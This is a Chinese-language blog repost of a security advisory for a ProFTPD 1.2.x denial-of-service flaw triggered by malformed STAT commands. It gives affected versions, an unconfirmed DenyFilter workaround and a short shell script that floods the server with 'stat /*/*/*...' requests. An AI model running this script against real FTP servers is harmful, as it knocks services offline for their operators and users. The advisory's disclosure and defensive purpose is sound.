`
izuoyan
  • 浏览: 8932904 次
  • 性别: Icon_minigender_1
  • 来自: 上海
社区版块
存档分类
最新评论

ProFTPD STAT命令远程拒绝服务攻击漏洞

阅读更多
发布日期:2002-12-09
更新日期:2002-12-16

受影响系统:
ProFTPD Project ProFTPD 1.2.7 rc3
ProFTPD Project ProFTPD 1.2.7 rc2
ProFTPD Project ProFTPD 1.2.7 rc1
ProFTPD Project ProFTPD 1.2.6
ProFTPD Project ProFTPD 1.2.5
ProFTPD Project ProFTPD 1.2.4
ProFTPD Project ProFTPD 1.2.3
ProFTPD Project ProFTPD 1.2.2
ProFTPD Project ProFTPD 1.2.1
- Linux系统
- Unix系统
描述:


BUGTRAQID: 6341

ProFTPD是一款开放源代码FTP服务程序。

ProFTPD不正确处理畸形STAT命令,远程攻击者可以利用这个漏洞对FTP服务程序进行拒绝服务攻击,使其停止响应。

攻击者如果向ProFTPD服务程序提交包含多个'/*'字符作为参数的STAT命令,会导致FTP服务崩溃,产生拒绝服务现象。

<*来源:b klein Gunnewiek (rmkleing@hio.hen.nl

链接:http://marc.theaimsgroup.com/?l=bugtraq&m=103963830009198&w=2
*>

测试方法:




警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
b klein Gunnewiek (rmkleing@hio.hen.nl)提供了如下测试方法:

#!/bin/sh
#
# proftpd <=1.2.7rc3 DoS - Requires anonymous/ftp login at least
# might work against many other FTP daemons
# consumes nearly all memory and alot of CPU
#
# tested against slackware 8.1 - proftpd 1.2.4 and 1.2.7rc3
#
# 7-dec-02 - detach-www.duho.org
#
# use: ./prodos.sh <host><user><pass><br># do this some more to make sure the system eventually dies<br><br>cnt=25<br>while [ $cnt -gt 0 ] ; do<br>ftp -n &lt;&lt; EOF&amp;<br>o $1<br>quote user $2<br>quote pass $3<br>quote stat /*/*/*/*/*/*/*<br>quit<br>EOF<br>let cnt=cnt-1<br>done<br>sleep 2<br>killall -9 ftp<br>echo DONE!<br><br>#end<br><br><strong>建议:</strong> <br></pass></user></host>

临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 在'proftpd.conf'文件中增加如下一行:

DenyFilter \*.*/

不过没有得到证实。

厂商补丁:

ProFTPD Project
---------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.proftpd.org/
分享到:
评论

相关推荐

    proftpd LINUX-FTP服务包

    架设LINUX-FTP服务的压缩包proftpd,具体安装方式网上有

    cpx_proftpd:漏洞利用工具 CVE-2015-3306

    cpx_proftpd Daniel Aldana 针对漏洞利用的 PoC。 Vadim Melihow 报告的错误。 ###方法1: 用法: python cpx_proftp.py &lt;IP&gt; &lt;REMOTE&gt; 前任: python cpx_proftp.py 127.0.0.1 /etc/passwd /var/...

    proftpd.tar.gz

    proftpd服务工具,解压后进入proftpd目录,运行 sh init.sh 脚本,输入登陆FTP的密码(用户名为当前登陆的用户名,不能使用root用户)确认默认的8021端口是否被占用,如果占用,修改 etc/proftpd.conf配置里的端口号,...

    proftpd1.2 linux下的ftp服务器软件(红帽子rpm)

    proftpd1.2 linux下的ftp服务器软件,安装后可以用作ftp服务器使用,此服务器较为流行,安全性好,配置和apache的配置类似,只要更改相应的配置文件就可以进行配置

    proftpd 1.3.2 for linux

    proftpd 1.3.2 for linux complie ./configure make make install

    proftpd 一键安装

    proftpd 一键安装

    proftpd安装.rar

    centos7.9安装编proftpd,带配置文件,添加虚拟用户,配置用户目录权限

    ProFtpd 配置

    教会你怎么利用ProFtpd服务(FTP)

    ProFTPD v1.3.4rc2.zip

    ProFTPD的原创者本身就曾经花非常多的时间寻找wu-ftpd 的漏洞加以改进并且增加许多功能。然而十分不幸的是,他很快地发现显然wu-ftpd需要全部重新的改写才能补足欠缺的设定能力以及缺乏的一些功能。ProFTPD不是从...

    centos7下proftpd+mysql安装配置.zip

    proftpd全称:Professional FTP daemon,是针对Wu-FTP的弱项而开发的,除了改进的安全性,还具备许多Wu-FTP没有的特点,能以Stand-alone、xinetd模式运行等。ProFTP已经成为继Wu-FTP之后最为流行的FTP服务器软件,...

    proftpd 简介

    proftpd是一款开放源码的ftp服务器软件,它是原来世界范围使用最广泛的wu-ftpd的改进版,它修正了wu-ftpd的许多缺陷,在许多方面进行了重大的改进,其中一个重要变化就是它学习了Apache 的配置方式,使proftpd的配置...

    Linux系统proftpd配置

    提供Linux系统下proftp安装,配置。

    proftpd支持mysql和quota配额

    proftpd支持mysql和quota配额

    proftpd1.3.2.tar.bz2

    proftpd1.3.2.tar.bz2 proftpd1.3.2.tar.bz2 用于linux下建立ftp服务

    proftpd使用教程

    proftpd 使用 方法,很有用的。linux环境下的。

    proftpd-1.2.10rc1.tar.gz

    proftpd-1.2.10rc1.tar.gz proftpd-1.2.10rc1.tar.gz proftpd-1.2.10rc1.tar.gz

    Linux下配置FTP服务(Proftpd)

    实现以下功能 1.配置FTP服务器,能够实现要求的功能; a.限制用户上传的速率为30K/s; b.... c....d.ftp用户只能上传,不能下载,不能删除,不能改名字。...e.teacher用户具有各种功能(下载,上传,删除,改名等);

    proftpd + mysql + quota配置完全指南

    proftpd + mysql + quota配置完全指南proftpd + mysql + quota配置完全指南proftpd + mysql + quota配置完全指南proftpd + mysql + quota配置完全指南

    proftpd虚拟用户挂载多个目录

    proftpd虚拟用户挂载多个目录

    proftpd安装和配置,2分钟搞定

    压缩包,包含配置文件和安装文件(proftpd-1.3.4b.tar.gz) 不需要太多的修改,就可以完成ftp的配置。 实现:指定用户访问一个特定的目录,不允许匿名登录

Global site tag (gtag.js) - Google Analytics